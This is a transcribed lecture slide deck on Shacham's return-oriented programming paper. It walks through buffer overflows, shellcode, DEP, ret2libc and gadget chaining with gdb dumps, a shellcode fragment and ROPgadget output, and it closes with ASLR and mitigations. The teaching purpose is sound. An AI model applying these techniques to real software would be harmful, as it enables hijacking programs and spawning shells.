The geometry of innocent flesh on the bone: Return-into-libc without function calls (on the x86) Hovav Shacham presented by: Fabian Fäßler

Similar documents
Return-orientated Programming

The Geometry of Innocent Flesh on the Bone

Buffer-Overflow Attacks on the Stack

Return oriented programming

Program Exploitation Intro

Buffer-Overflow Attacks on the Stack

This time. Defenses and other memory safety vulnerabilities. Everything you ve always wanted to know about gdb but were too afraid to ask

Exploiting Stack Buffer Overflows Learning how blackhats smash the stack for fun and profit so we can prevent it

Lab 3. The Art of Assembly Language (II)

BUFFER OVERFLOW DEFENSES & COUNTERMEASURES

16.317: Microprocessor Systems Design I Fall 2015

Introduction to Reverse Engineering. Alan Padilla, Ricardo Alanis, Stephen Ballenger, Luke Castro, Jake Rawlins

Function Call Convention

Lecture 10 Return-oriented programming. Stephen Checkoway University of Illinois at Chicago Based on slides by Bailey, Brumley, and Miller

X86 Addressing Modes Chapter 3" Review: Instructions to Recognize"

Architecture-level Security Vulnerabilities

Advanced Security for Systems Engineering VO 05: Advanced Attacks on Applications 2

CSE 127: Computer Security Control Flow Hijacking. Kirill Levchenko

Practical Malware Analysis

Reverse Engineering II: Basics. Gergely Erdélyi Senior Antivirus Researcher

Buffer Overflow Attack

CSC 591 Systems Attacks and Defenses Return-into-libc & ROP

Architecture-level Security Vulnerabilities. Julian Stecklina

Reverse Engineering II: The Basics

Return Oriented Programming

Machine-level Representation of Programs. Jin-Soo Kim Computer Systems Laboratory Sungkyunkwan University

Intro x86 Part 3: Linux Tools & Analysis

CSE509 System Security

16.317: Microprocessor Systems Design I Fall 2014

Instruction Set Architectures

Robust Shell Code Return Oriented Programming and HeapSpray. Zhiqiang Lin

Exercise 6: Buffer Overflow and return-into-libc Attacks

Basic Pentium Instructions. October 18

CS165 Computer Security. Understanding low-level program execution Oct 1 st, 2015

Mitchell Adair January, 2014

Outline. Memory Exploit

Overview of Compiler. A. Introduction

Lecture 2 Assembly Language

Assembly Programmer s View Lecture 4A Machine-Level Programming I: Introduction

idkwim in SecurityFirst 0x16 years old Linux system security researcher idkwim.tistory.com idkwim.linknow.

MACHINE-LEVEL PROGRAMMING I: BASICS COMPUTER ARCHITECTURE AND ORGANIZATION

CS412/CS413. Introduction to Compilers Tim Teitelbaum. Lecture 21: Generating Pentium Code 10 March 08

Instruction Set Architectures

Università Ca Foscari Venezia

CSC 2400: Computer Systems. Towards the Hardware: Machine-Level Representation of Programs

Reverse Engineering II: The Basics

CSC 8400: Computer Systems. Machine-Level Representation of Programs

CPS104 Recitation: Assembly Programming

Lecture 15 Intel Manual, Vol. 1, Chapter 3. Fri, Mar 6, Hampden-Sydney College. The x86 Architecture. Robb T. Koether. Overview of the x86

From Over ow to Shell

complement) Multiply Unsigned: MUL (all operands are nonnegative) AX = BH * AL IMUL BH IMUL CX (DX,AX) = CX * AX Arithmetic MUL DWORD PTR [0x10]

CNIT 127: Exploit Development. Ch 1: Before you begin. Updated

16.317: Microprocessor Systems Design I Spring 2015

Reverse Engineering Low Level Software. CS5375 Software Reverse Engineering Dr. Jaime C. Acosta

CMSC 313 Lecture 12. Project 3 Questions. How C functions pass parameters. UMBC, CMSC313, Richard Chang

Turning C into Object Code Code in files p1.c p2.c Compile with command: gcc -O p1.c p2.c -o p Use optimizations (-O) Put resulting binary in file p

Lecture 08 Control-flow Hijacking Defenses

Biography. Background

CSE P 501 Compilers. x86 Lite for Compiler Writers Hal Perkins Autumn /25/ Hal Perkins & UW CSE J-1

String Oriented Programming Exploring Format String Attacks. Mathias Payer

Representation of Information

CSCI 334: Principles of Programming Languages. Computer Architecture (a really really fast introduction) Lecture 11: Control Structures II

The x86 Architecture

Secure Systems Engineering

CNIT 127: Exploit Development. Ch 3: Shellcode. Updated

Rev101. spritzers - CTF team. spritz.math.unipd.it/spritzers.html

X86 Review Process Layout, ISA, etc. CS642: Computer Security. Drew Davidson

Machine-Level Programming Introduction

Intro to x86 Binaries. From ASM to exploit

Smashing the Buffer. Miroslav Štampar

Exploits and gdb. Tutorial 5

Advanced Buffer Overflow

Complex Instruction Set Computer (CISC)

Second Part of the Course

FLARE-On 4: Challenge 3 Solution greek_to_me.exe

CNIT 127: Exploit Development. Ch 2: Stack Overflows in Linux

Stack -- Memory which holds register contents. Will keep the EIP of the next address after the call

Autodesk AutoCAD DWG-AC1021 Heap Corruption

x86 assembly CS449 Fall 2017

Payload Already Inside: Data re-use for ROP Exploits

UMBC. A register, an immediate or a memory address holding the values on. Stores a symbolic name for the memory location that it represents.

Security-Aware Processor Architecture Design. CS 6501 Fall 2018 Ashish Venkat

«Defeating DEP through a mapped file»

MACHINE-LEVEL PROGRAMMING I: BASICS

Abstraction Recovery for Scalable Static Binary Analysis

Systems I. Machine-Level Programming I: Introduction

Selected background on ARM registers, stack layout, and calling convention

Bypassing DEP with WPM & ROP Case Study : Audio Converter by D.R Software Exploit and Document by Sud0 sud0.x90 [ at ] gmail.com sud0 [at] corelan.

Betriebssysteme und Sicherheit Sicherheit. Buffer Overflows

2 Sadeghi, Davi TU Darmstadt 2012 Secure, Trusted, and Trustworthy Computing Chapter 6: Runtime Attacks

Y86 Processor State. Instruction Example. Encoding Registers. Lecture 7A. Computer Architecture I Instruction Set Architecture Assembly Language View

EECE.3170: Microprocessor Systems Design I Summer 2017 Homework 4 Solution

CPEG421/621 Tutorial

Lab 10: Introduction to x86 Assembly

Instruction Set Architecture

Instruction Set Architecture

Chapter 4 Processor Architecture: Y86 (Sections 4.1 & 4.3) with material from Dr. Bin Ren, College of William & Mary

Applying Return Oriented and Jump Oriented Programming Exploitation Techniques with Heap Spraying

Today: Machine Programming I: Basics

Introduction to IA-32. Jo, Heeseung

Transcription:

The geometry of innocent flesh on the bone: Return-into-libc without function calls (on the x86) Hovav Shacham presented by: Fabian Fäßler

return-oriented programming Hovav Shacham presented by: Fabian Fäßler

ROP Hovav Shacham presented by: Fabian Fäßler

What to take away from this Programming languages exist where you don t expect them weird machine There is additional code in every binary, but nobody put it there intentionally A creative way to bypass a security mechanism 4

Overview Buffer Overflow + Shellcode DEP / W X return2libc return-oriented programming additional information 5

Buffer Overflow + Shellcode 0x080483c4 <main+0>: push 0x080483c5 <main+1>: mov 0x080483c7 <main+3>: and 0x080483ca <main+6>: sub 0x080483cd <main+9>: lea 0x080483d1 <main+13>: mov 0x080483d4 <main+16>: call 0x080483d9 <main+21>: leave 0x080483da <main+22>: ret ebp ebp,esp esp,0xfffffff0 esp,0x50 eax,[esp+0x10] DWORD PTR [esp],eax 0x80482e8 <gets@plt> 6 source: exploit-exercises.com

Buffer Overflow + Shellcode --> 0x080483c4 <main+0>: push 0x080483c5 <main+1>: mov 0x080483c7 <main+3>: and 0x080483ca <main+6>: sub 0x080483cd <main+9>: lea 0x080483d1 <main+13>: mov 0x080483d4 <main+16>: call 0x080483d9 <main+21>: leave 0x080483da <main+22>: ret ebp ebp,esp esp,0xfffffff0 esp,0x50 eax,[esp+0x10] DWORD PTR [esp],eax 0x80482e8 <gets@plt> eax 0xbffffc60 ecx 0xbbb5764b edx 0x00000001 ebx 0xb7fd7ff4 esp 0xbffffc50 ebp 0xbffffca8 esi 0x00000000 edi 0x00000000 eip 0x080483d4 <main+16> 0xbffffc60 0xb7ec6165 0xbffffc68 0xb7eada75 0xb7fd7ff4 0x0804958c 0xbffffc78 0x080482c4 0xb7ff1040 0x0804958c 7 source: exploit-exercises.com

Buffer Overflow + Shellcode 0x080483c4 <main+0>: push 0x080483c5 <main+1>: mov 0x080483c7 <main+3>: and 0x080483ca <main+6>: sub 0x080483cd <main+9>: lea 0x080483d1 <main+13>: mov 0x080483d4 <main+16>: call 0x080483d9 <main+21>: leave 0x080483da <main+22>: ret ebp ebp,esp esp,0xfffffff0 esp,0x50 eax,[esp+0x10] DWORD PTR [esp],eax 0x80482e8 <gets@plt> 0xb7ef3e40 <_IO_gets+0>: push ebp... 0xb7ef3f2c <_IO_gets+236>: pop ebp 0xb7ef3f2d <_IO_gets+237>: ret eax ecx edx ebx esp ebp esi edi eip 0xbffffc60 0xbbb5764b 0x00000001 0xb7fd7ff4 0xbffffc4c 0xbffffca8 0x00000000 0x00000000 0xb7ef3e40 <_IO_gets+0> 0x080483d9 0xbffffc60 0xb7ec6165 0xbffffc68 0xb7eada75 0xb7fd7ff4 0x0804958c 0xbffffc78 0x080482c4 0xb7ff1040 8 source: exploit-exercises.com

Buffer Overflow + Shellcode 0x080483c4 <main+0>: push 0x080483c5 <main+1>: mov 0x080483c7 <main+3>: and 0x080483ca <main+6>: sub 0x080483cd <main+9>: lea 0x080483d1 <main+13>: mov 0x080483d4 <main+16>: call 0x080483d9 <main+21>: leave 0x080483da <main+22>: ret ebp ebp,esp esp,0xfffffff0 esp,0x50 eax,[esp+0x10] DWORD PTR [esp],eax 0x80482e8 <gets@plt> 0xb7ef3e40 <_IO_gets+0>: push ebp... 0xb7ef3f2c <_IO_gets+236>: pop ebp 0xb7ef3f2d <_IO_gets+237>: ret eax ecx edx ebx esp ebp esi edi eip 0xbffffc60 0xbffffc60 0xb7fd9334 0xb7fd7ff4 0xbffffc4c 0xbffffca8 0x00000000 0x00000000 0xb7ef3f2d <_IO_gets+237> 0x080483d9 0xbffffc60 0xb7ec6165 0xbffffc68 0xb7eada75 0xb7fd7ff4 0x0804958c 0xbffffc78 0x080482c4 0xb7ff1040 9 source: exploit-exercises.com

Buffer Overflow + Shellcode 0x080483c4 <main+0>: push 0x080483c5 <main+1>: mov 0x080483c7 <main+3>: and 0x080483ca <main+6>: sub 0x080483cd <main+9>: lea 0x080483d1 <main+13>: mov 0x080483d4 <main+16>: call 0x080483d9 <main+21>: leave 0x080483da <main+22>: ret eax ecx edx ebx esp ebp esi edi eip ebp ebp,esp esp,0xfffffff0 esp,0x50 eax,[esp+0x10] DWORD PTR [esp],eax 0x80482e8 <gets@plt> 0xbffffc60 0xbffffc60 0xb7fd9334 0xb7fd7ff4 0xbffffc4c 0xbffffca8 0x00000000 0x00000000 0xb7ef3f2d <_IO_gets+237> 0xb7ef3e40 <_IO_gets+0>: push ebp... 0xb7ef3f2c <_IO_gets+236>: pop ebp 0xb7ef3f2d <_IO_gets+237>: ret? 0xb7eada75 0xb7fd7ff4 0x0804958c 0xbffffc78 0x080482c4 0xb7ff1040 10 source: exploit-exercises.com

Buffer Overflow + Shellcode 0x31c05068 0x2f2f7368 0x682f6269 0x6e89e350 0xbffffc30 0xb7eada75 0xb7fd7ff4 0x0804958c 0xbffffc78 0x080482c4 0xb7ff1040 11

Buffer Overflow + Shellcode Shellcode Restrictions: Attacker has to write it somewhere Write destination has to be executable 0x31c05068 0x2f2f7368 0x682f6269 0x6e89e350 0xbffffc30 0xb7eada75 0xb7fd7ff4 0x0804958c 0xbffffc78 0x080482c4 0xb7ff1040 12

DEP / W X Shellcode Restrictions: Attacker has to write it somewhere Write destination has to be executable! Countermeasures: Data Execution Prevention Write XOR Execute - memory protection policy 13

ret2libc? 0xb7eada75 0xb7fd7ff4 0x0804958c 0xbffffc78 0x080482c4 0xb7ff1040 14

ret2libc (gdb) x system 0xb7ecffb0 < libc_system>: 0x890cec83 (gdb) disassemble system Dump of assembler code for function libc_system: 0xb7ecffb0 < libc_system+0>: sub esp,0xc 0xb7ecffb3 < libc_system+3>: mov DWORD PTR [esp+0x4],esi 0xb7ecffb7 < libc_system+7>: mov esi,dword PTR [esp+0x10] system() without one line of injected code but what about parameters? We want to call system( /bin/sh ) Parameter passed with register eax 0xb7ecffb0 0xb7eada75 0xb7fd7ff4 0x0804958c 0xbffffc78 0x080482c4 0xb7ff1040 15

ret2libc (gdb) disassemble mcount Dump of assembler code for function mcount: 0xb7f65fb0 <mcount+0>: push eax 0xb7f65fb1 <mcount+1>: push ecx 0xb7f65fb2 <mcount+2>: push edx 0xb7f65fb3 <mcount+3>: mov edx,dword PTR [esp+0xc] 0xb7f65fb7 <mcount+7>: mov eax,dword PTR [ebp+0x4] 0xb7f65fba <mcount+10>: call 0xb7f654c0 < mcount_internal> 0xb7f65fbf <mcount+15>: pop edx 0xb7f65fc0 <mcount+16>: pop ecx 0xb7f65fc1 <mcount+17>: pop eax 0xb7f65fc2 <mcount+18>: ret system() without one line of injected code but what about parameters? We want to call system( /bin/sh ) Parameter passed with register eax 0xb7f65fc1 0xb7ecffb0 0xb7eada75 0xb7fd7ff4 0x0804958c 0xbffffc78 0x080482c4 0xb7ff1040 16

ret2libc (gdb) disassemble mcount Dump of assembler code for function mcount: 0xb7f65fb0 <mcount+0>: push eax 0xb7f65fb1 <mcount+1>: push ecx 0xb7f65fb2 <mcount+2>: push edx 0xb7f65fb3 <mcount+3>: mov edx,dword PTR [esp+0xc] 0xb7f65fb7 <mcount+7>: mov eax,dword PTR [ebp+0x4] 0xb7f65fba <mcount+10>: call 0xb7f654c0 < mcount_internal> 0xb7f65fbf <mcount+15>: pop edx 0xb7f65fc0 <mcount+16>: pop ecx 0xb7f65fc1 <mcount+17>: pop eax 0xb7f65fc2 <mcount+18>: ret system() without one line of injected code but what about parameters? We want to call system( /bin/sh ) Parameter passed with register eax 0xb7f65fbf 0xb7ecffb0 0xb7eada75 0xb7fd7ff4 0x0804958c 0xbffffc78 0x080482c4 0xb7ff1040 17

ret2libc (gdb) disassemble mcount Dump of assembler code for function mcount: 0xb7f65fb0 <mcount+0>: push eax 0xb7f65fb1 <mcount+1>: push ecx 0xb7f65fb2 <mcount+2>: push edx 0xb7f65fb3 <mcount+3>: mov edx,dword PTR [esp+0xc] 0xb7f65fb7 <mcount+7>: mov eax,dword PTR [ebp+0x4] 0xb7f65fba <mcount+10>: call 0xb7f654c0 < mcount_internal> 0xb7f65fbf <mcount+15>: pop edx 0xb7f65fc0 <mcount+16>: pop ecx 0xb7f65fc1 <mcount+17>: pop eax 0xb7f65fc2 <mcount+18>: ret system() without one line of injected code but what about parameters? We want to call system( /bin/sh ) Parameter passed with register eax 0xb7f65fbf 0xb7ecffb0 0xb7eada75 0xb7fd7ff4 0x0804958c 0xbffffc78 0x080482c4 0xb7ff1040 18

ret2libc (gdb) disassemble mcount Dump of assembler code for function mcount: 0xb7f65fb0 <mcount+0>: push eax 0xb7f65fb1 <mcount+1>: push ecx 0xb7f65fb2 <mcount+2>: push edx 0xb7f65fb3 <mcount+3>: mov edx,dword PTR [esp+0xc] 0xb7f65fb7 <mcount+7>: mov eax,dword PTR [ebp+0x4] 0xb7f65fba <mcount+10>: call 0xb7f654c0 < mcount_internal> 0xb7f65fbf <mcount+15>: pop edx 0xb7f65fc0 <mcount+16>: pop ecx 0xb7f65fc1 <mcount+17>: pop eax 0xb7f65fc2 <mcount+18>: ret! Gadget 0xb7f65fbf 0xb7ecffb0 0xb7eada75 0xb7fd7ff4 0x0804958c 0xbffffc78 0x080482c4 0xb7ff1040 19

ret2libc - recap Oldschool shellcode requires write AND execute rights ret2libc can be used to call critical functions such as system, execve, etc. You can load parameters and chain functions! 20

ret2libc - recap Oldschool shellcode requires write AND execute rights ret2libc can be used to call critical functions such as system, execve, etc. You can load parameters and chain functions! Evolution of ret2libc is ROP 21

ROP - step 1/2 1. Find gadgets asm 0xb7f65fbf <mcount+15>: 0xb7f65fc0 <mcount+16>: 0xb7f65fc1 <mcount+17>: 0xb7f65fc2 <mcount+18>: pop edx pop ecx pop eax ret 0x51 0x59 0x58 0xc3 22

ROP - step 1/2 1. Find gadgets asm 0xb7f65fbf <mcount+15>: 0xb7f65fc0 <mcount+16>: 0xb7f65fc1 <mcount+17>: 0xb7f65fc2 <mcount+18>: pop edx pop ecx pop eax ret 0x51 0x59 0x58 0xc3 0xb7f0bc0d <stpcpy+61>: 0xb7f0bc0e <stpcpy+62>: 0xb7f0bc0f <stpcpy+63>: 0xb7f0bc10 <stpcpy+64>: inc eax inc eax inc eax ret 0xb7f29fc7 <dirfd+7>: 0xb7f29fc9 <dirfd+9>: mov eax,dword PTR [eax] ret 23

ROP - step 1/2 1. Find gadgets - advanced 24

ROP - step 1/2 1. Find gadgets - advanced 25

ROP - step 1/2 1. Find gadgets - advanced 000428b2 : ror byte ptr [edi], -0x7c 000428b5 : ret 26

ROP - step 1/2 1. Find gadgets - advanced 000428b2 : ror byte ptr [edi], -0x7c 000428b5 : ret algorithm: search for 0xc3 (ret), and look backwards if there are valid instructions. 27

ROP - step 1/2 1. Find gadgets - advanced $ python ROPgadget.py --binary ~/libc.so.6 0x00138c14 : xor al, -0x20 ; add byte ptr [eax], al ; sbb ah, cl ; cli ; call edi 0x00128f04 : xor al, -0x58 ; add byte ptr [eax], al ; cld ; ret -0xa 0x0012ab71 : sub esi, edi ; jmp esp 0x00132835 : sub esi, esi ; call dword ptr [eax] 0x00028188 : sub esp, 0x10 ; call 0x16ad8 0x0003d595 : rol byte ptr [ecx], -0x7d ; ret 0x390c 0x0012879a : rep push eax ; jnp 0x1287a8 ; add byte ptr [esp + edi*8 + 0xfffffff3], bl ; call dword ptr [eax] 0x00072d09 : or dword ptr [ebx + 0x960ff07d], ecx ; ret 0x5589 0x000a4079 : movzx eax, al ; sub eax, 1 ; pop ebp ; ret 0x00097c4a : mov eax, 0x39 ; int 0x80 0x0011b958 : jo 0x11b901 ; hlt ; call ebx 0x0006557c : jge 0x6557f ; mov esp, ebp ; pop ebp ; ret 0x00022146 : add eax, dword ptr [eax] ; add byte ptr [ebx + 0xfffe548d], cl ; jmp dword ptr [ebx]... 28

geometry intel assembler is very dense and doesn t enforce alignment.! meaning that a random byte stream can be interpreted as a series of valid instructions with high probability [0] 29

geometry intel assembler is very dense and doesn t enforce alignment.! meaning that a random byte stream can be interpreted as a series of valid instructions with high probability [0] ARM has 32bit and 16bit wide instructions. Forcing THUMB mode could be used as well. 30

geometry intel assembler is very dense and doesn t enforce alignment.! meaning that a random byte stream can be interpreted as a series of valid instructions with high probability [0] ARM has 32bit and 16bit wide instructions. Forcing THUMB mode could be used as well.! MIPS enforces 32bit instructions and alignment.! 31

ROP - step 2/2 2. The weird machine - building an instruction set. 32

ROP - step 2/2 2. The weird machine - building an instruction set. 0xb7f65fbf <mcount+15>: 0xb7f65fc0 <mcount+16>: 0xb7f65fc1 <mcount+17>: 0xb7f65fc2 <mcount+18>: pop edx pop ecx pop eax ret load values into registers 0xb7f0bc0d <stpcpy+61>: 0xb7f0bc0e <stpcpy+62>: 0xb7f0bc0f <stpcpy+63>: 0xb7f0bc10 <stpcpy+64>: inc eax inc eax inc eax ret increment registers 0xb7f29fc7 <dirfd+7>: 0xb7f29fc9 <dirfd+9>: mov eax,dword PTR [eax] ret load from an address 33

ROP - step 2/2 2. The weird machine - building an instruction set. add: 34

ROP - step 2/2 2. The weird machine - building an instruction set. add: 35

ROP - step 2/2 2. The weird machine - building an instruction set. add: 36

ROP - step 2/2 2. The weird machine - building an instruction set. Loading Constant Loading from Memory Storing to Memory Add XOR And/Or/Not Shift and Rotate Unconditional Jumps Conditional Jumps System Calls Function Calls (ret2libc) 37 Write any code you like <3

a weird machine is born source: The science 38 of Insecurity (29c3) - Sassman, Patterson, Bratus

What to take away from this Programming languages exist where you don t expect them weird machine There is additional code in every binary, but nobody put it there intentionally A creative way to bypass a security mechanism 39

What to take away from this Programming languages exist where you don t expect them weird machine There is additional code in every binary, but nobody put it there intentionally A creative way to bypass a security mechanism 40

What to take away from this Programming languages exist where you don t expect them weird machine There is additional code in every binary, but nobody put it there intentionally A creative way to bypass a security mechanism 41

Discussion What is the obvious mitigation for this? 42

The ASLR Lie source: http://www.sophos.com/en-us/support/knowledgebase/118424.aspx

The ASLR Lie source: http://docs.oracle.com/cd/e36784_01/html/e37121/concept-aslr-1.html

The ASLR Lie source: http://kernelnewbies.org/linux_3.14

Discussion What do you think about, ROP, geometry, ASLR, W X 46

References The Geometry of Innocent Flesh on the Bone: Return-into-libc without Function Calls (on the x86) - [0] direct quote page 4 - Figure 5 - Figure 7 exploit-exercises.com http://kernelnewbies.org/linux_3.14 http://docs.oracle.com/cd/e36784_01/html/e37121/concept-aslr-1.html http://www.sophos.com/en-us/support/knowledgebase/118424.aspx The science of Insecurity - Sassman, Patterson, Bratus http://langsec.org/insecurity-theory-28c3.pdf 47

2024 © technodocbox.com Privacy Policy | Terms of Service | Feedback